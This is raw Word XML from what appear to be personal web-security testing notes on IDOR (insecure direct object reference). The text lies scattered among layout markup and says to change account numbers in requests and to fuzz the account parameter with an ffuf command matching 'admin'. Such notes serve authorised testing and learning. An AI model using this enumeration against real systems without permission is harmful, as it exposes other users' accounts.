                            <a:ext cx="11607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DA3E0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId7">
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="117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9" name="Rectangle 3839"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3119279" y="276983"/>
                            <a:ext cx="52841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3157" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="125"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>secex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5" name="Rectangle 3845"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3516580" y="276983"/>
                            <a:ext cx="11607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360F9" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId8">
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="117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6" name="Rectangle 3846"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3603854" y="276983"/>
                            <a:ext cx="601897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6305F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="117"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>lained.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2" name="Rectangle 3852"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4056408" y="276983"/>
                            <a:ext cx="11607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407C0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId9">
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="130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3" name="Rectangle 3853"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4143682" y="276983"/>
                            <a:ext cx="1066193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A9983" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="114"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>itbook.io/ap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" name="Rectangle 3861"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4945331" y="276983"/>
                            <a:ext cx="11607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96E8F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId10">
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="117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2" name="Rectangle 3862"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5032604" y="276983"/>
                            <a:ext cx="52841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878E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="125"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>secex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9" name="Rectangle 3869"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5429906" y="276983"/>
                            <a:ext cx="11607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714C8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId11">
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="117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0" name="Rectangle 3870"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5517179" y="276983"/>
                            <a:ext cx="54910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D5884" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="155BDA"/>
                                  <w:w w:val="118"/>
                                  <w:u w:val="single" w:color="155BDA"/>
                                </w:rPr>
                                <w:t>lained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8" name="Rectangle 3868"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5930038" y="276983"/>
                            <a:ext cx="52795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1B134" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                              <w:hyperlink r:id="rId12">
                                <w:r>
                                  <w:rPr>
                                    <w:b/>
                                    <w:color w:val="155BDA"/>
                                    <w:w w:val="76"/>
                                    <w:u w:val="single" w:color="155BDA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180E4" id="Group 4195" o:spid="_x0000_s1033" style="width:518.25pt;height:43.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5245" o:spid="_x0000_s1034" style="position:absolute;top:5334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57" o:spid="_x0000_s1035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" path="m23813,v3157,,6195,604,9112,1812c35843,3020,38418,4741,40651,6973v2232,2233,3953,4808,5161,7725c47021,17617,47625,20654,47625,23813v,3157,-604,6194,-1813,9112c44604,35841,42883,38417,40651,40650v-2233,2233,-4808,3953,-7726,5161c30008,47020,26970,47624,23813,47625v-3158,-1,-6196,-605,-9113,-1814c11783,44603,9207,42883,6975,40650,4742,38417,3021,35841,1813,32925,604,30007,,26970,,23813,,20654,604,17617,1813,14699,3021,11781,4742,9206,6975,6973,9207,4741,11783,3020,14700,1812,17617,604,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 58" o:spid="_x0000_s1036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" path="m47625,23813v,3157,-604,6194,-1813,9111c44604,35841,42883,38416,40650,40650v-2232,2233,-4808,3953,-7725,5161c30008,47020,26970,47624,23813,47625v-3158,-1,-6196,-605,-9113,-1814c11783,44603,9207,42883,6975,40650,4742,38416,3021,35841,1813,32924,604,30007,,26970,,23813,,20654,604,17617,1813,14699,3021,11781,4742,9206,6975,6974,9207,4741,11783,3020,14700,1812,17617,604,20655,,23813,v3157,,6195,604,9112,1812c35842,3020,38418,4741,40650,6974v2233,2232,3954,4807,5162,7724c47021,17617,47625,20654,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 59" o:spid="_x0000_s1037" style="position:absolute;left:4857;top:2769;width:2531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C8804A4" w14:textId="68374664" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>We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can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use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8"/>
                          </w:rPr>
                          <w:t>authors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wiki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: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3" o:spid="_x0000_s1038" style="position:absolute;left:23891;top:2769;width:242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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="04D90994" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="108"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>htt</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3835" o:spid="_x0000_s1039" style="position:absolute;left:25715;top:2769;width:116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w3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vHwEx5vwhOQszsAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA0B8cN8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="676E1096" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId13">
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="117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3836" o:spid="_x0000_s1040" style="position:absolute;left:26588;top:2769;width:496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YJA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CDNgkDHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="20C372F6" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="110"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>s://ap</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3838" o:spid="_x0000_s1041" style="position:absolute;left:30320;top:2769;width:116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rOp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D4es6nEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6CCDA3E0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId14">
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="117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3839" o:spid="_x0000_s1042" style="position:absolute;left:31192;top:2769;width:528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hYy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BRUhYyxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3F853157" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="125"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>secex</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3845" o:spid="_x0000_s1043" style="position:absolute;left:35165;top:2769;width:116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  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="10E360F9" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId15">
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="117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3846" o:spid="_x0000_s1044" style="position:absolute;left:36038;top:2769;width:601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  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2CC6305F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="117"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>lained.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3852" o:spid="_x0000_s1045" style="position:absolute;left:40564;top:2769;width:116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WHj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gilh48YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="414407C0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId16">
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="130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3853" o:spid="_x0000_s1046" style="position:absolute;left:41436;top:2769;width:1066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R4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7WXEeMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="543A9983" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="114"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>itbook.io/ap</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3861" o:spid="_x0000_s1047" style="position:absolute;left:49453;top:2769;width:116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Up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8lzUpxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="58396E8F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId17">
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="117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3862" o:spid="_x0000_s1048" style="position:absolute;left:50326;top:2769;width:528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te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ExFq17HAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="49CF878E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="125"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>secex</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3869" o:spid="_x0000_s1049" style="position:absolute;left:54299;top:2769;width:116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Tkv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8TeDxJjwBOf8HAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAQuE5L8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6C4714C8" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId18">
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="117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3870" o:spid="_x0000_s1050" style="position:absolute;left:55171;top:2769;width:549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gZv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vFX2B/ehCcg528AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAVgIGb8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="43ED5884" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="155BDA"/>
                            <w:w w:val="118"/>
                            <w:u w:val="single" w:color="155BDA"/>
                          </w:rPr>
                          <w:t>lained</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3868" o:spid="_x0000_s1051" style="position:absolute;left:59300;top:2769;width:52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y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OaGN+EJyOU/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC2tnLTEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0291B134" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00AB6EF2">
                        <w:hyperlink r:id="rId19">
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="155BDA"/>
                              <w:w w:val="76"/>
                              <w:u w:val="single" w:color="155BDA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DB192E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="286"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Authentication 0x04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1861E1F0" w14:textId="00E41BB0" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:left="765" w:hanging="615"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E288F7" wp14:editId="77AD73DF">
                <wp:extent cx="285750" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3883" name="Group 3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361950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="36195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3" style="width:22.5pt;height:28.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="2857,3619">
                <v:shape id="Shape 128" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,603,32925,1812c35843,3019,38418,4740,40651,6974c42883,9206,44604,11781,45812,14699c47021,17616,47625,20653,47625,23813c47625,26969,47021,30005,45812,32922c44604,35840,42883,38416,40651,40649c38418,42882,35843,44602,32925,45810c30008,47019,26970,47623,23813,47625c20655,47623,17617,47019,14700,45810c11783,44602,9207,42882,6975,40649c4742,38416,3021,35842,1813,32924c604,30006,0,26969,0,23813c0,20653,604,17616,1813,14699c3021,11781,4742,9206,6975,6974c9207,4740,11783,3019,14700,1812c17617,603,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 129" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30006,45812,32924c44604,35842,42883,38416,40650,40649c38418,42881,35842,44602,32925,45810c30008,47019,26970,47623,23813,47625c20655,47623,17617,47019,14700,45810c11783,44602,9207,42881,6975,40649c4742,38416,3021,35842,1813,32924c604,30006,0,26969,0,23813c0,20655,604,17616,1813,14699c3021,11781,4742,9206,6975,6974c9207,4740,11783,3019,14700,1812c17617,603,20655,0,23813,0c26970,0,30008,603,32925,1812c35842,3019,38418,4740,40650,6974c42883,9206,44604,11781,45812,14699c47021,17616,47625,20655,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> header we have a number for account change it and send the req with </w:t>
      </w:r>
      <w:r w:rsidR="00303E9F">
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t xml:space="preserve"> number and verify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E25810F" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26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544333DD" wp14:editId="312976E2">
                <wp:extent cx="6581774" cy="1713743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713743"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="1713743"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5305" name="Shape 5305"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1694694"/>
                            <a:ext cx="6581774" cy="19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49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49"/>
                                </a:ln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3375" y="373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85775" y="0"/>
                            <a:ext cx="358893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4450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15"/>
                                </w:rPr>
                                <w:t>Idor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55749" y="0"/>
                            <a:ext cx="294156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AAE80" w14:textId="03DB5D30" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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-&gt;Insecure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direct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object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8"/>
                                </w:rPr>
                                <w:t>reference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333375" y="32309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85775" y="285750"/>
                            <a:ext cx="2450916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DA9C" w14:textId="2E7F7FB5" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>Info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7"/>
                                </w:rPr>
                                <w:t>return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based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on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object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id.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333375" y="6088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85775" y="571500"/>
                            <a:ext cx="5724558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217EE" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>Create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multiple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user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accounts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verify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real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world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applications.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333375" y="89459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85775" y="857250"/>
                            <a:ext cx="4394113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0B493" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="108"/>
                                </w:rPr>
                                <w:t>Do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not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impact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other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user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accounts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if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bug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found..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333375" y="118034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85775" y="1143000"/>
                            <a:ext cx="450731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A1B8E" w14:textId="77777777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We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will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1008,1010,1012,1014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admin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accounts.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333375" y="146609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5775" y="1428750"/>
                            <a:ext cx="4754027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63F4D" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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ffuf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-u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'&lt;url&lt;account=FFUZ&gt;&gt;'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-w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num.txt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-mr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'admin'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333DD" id="Group 3880" o:spid="_x0000_s1052" style="width:518.25pt;height:134.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,17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">
                <v:shape id="Shape 5305" o:spid="_x0000_s1053" style="position:absolute;top:16946;width:65817;height:191;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6581774,1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" path="m,l6581774,r,19049l,19049,,e" fillcolor="#ddd" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6581774,19049"/>
                </v:shape>
                <v:shape id="Shape 132" o:spid="_x0000_s1054" style="position:absolute;left:3333;top:37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" path="m47625,23813v,3156,-604,6193,-1813,9111c44604,35840,42883,38416,40650,40649v-2232,2233,-4808,3954,-7725,5162c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1814c11783,44603,9207,42882,6975,40649,4742,38416,3021,35840,1813,32924,604,30006,,26969,,23813,,20653,604,17616,1813,14699,3021,11781,4742,9206,6975,6974,9207,4740,11783,3019,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3019,38418,4740,40650,6974v2233,2232,3954,4807,5162,7725c47021,17616,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 133" o:spid="_x0000_s1055" style="position:absolute;left:4857;width:358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CC24450" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="32373F"/>
                            <w:w w:val="115"/>
                          </w:rPr>
                          <w:t>Idor</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 134" o:spid="_x0000_s1056" style="position:absolute;left:7557;width:2941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A6AAE80" w14:textId="03DB5D30" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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-&gt;Insecure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direct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object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8"/>
                          </w:rPr>
                          <w:t>reference</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 135" o:spid="_x0000_s1057" style="position:absolute;left:3333;top:323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" path="m47625,23813v,3156,-604,6193,-1813,9111c44604,35840,42883,38416,40650,40649v-2232,2232,-4808,3953,-7725,5162c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1814c11783,44602,9207,42881,6975,40649,4742,38416,3021,35840,1813,32924,604,30006,,26969,,23813,,20653,604,17615,1813,14698,3021,11781,4742,9206,6975,6974,9207,4740,11783,3019,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3019,38418,4740,40650,6974v2233,2232,3954,4807,5162,7724c47021,17615,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 136" o:spid="_x0000_s1058" style="position:absolute;left:4857;top:2857;width:2450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C80DA9C" w14:textId="2E7F7FB5" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>Info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7"/>
                          </w:rPr>
                          <w:t>return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based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on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object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id.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 137" o:spid="_x0000_s1059" style="position:absolute;left:3333;top:608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" path="m47625,23813v,3156,-604,6192,-1813,9109c44604,35840,42883,38415,40650,40649v-2232,2232,-4808,3953,-7725,5161c30008,47019,26970,47623,23813,47625v-3158,-2,-6196,-606,-9113,-1815c11783,44602,9207,42881,6975,40649,4742,38415,3021,35840,1813,32922,604,30005,,26969,,23813,,20653,604,17615,1813,14698,3021,11781,4742,9206,6975,6974,9207,4740,11783,3019,14700,1812,17617,603,20655,,23813,v3157,,6195,603,9112,1812c35842,3019,38418,4740,40650,6974v2233,2232,3954,4807,5162,7724c47021,17615,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 138" o:spid="_x0000_s1060" style="position:absolute;left:4857;top:5715;width:5724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F4217EE" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="108"/>
                          </w:rPr>
                          <w:t>Create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multiple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user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accounts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verify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real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world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applications.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
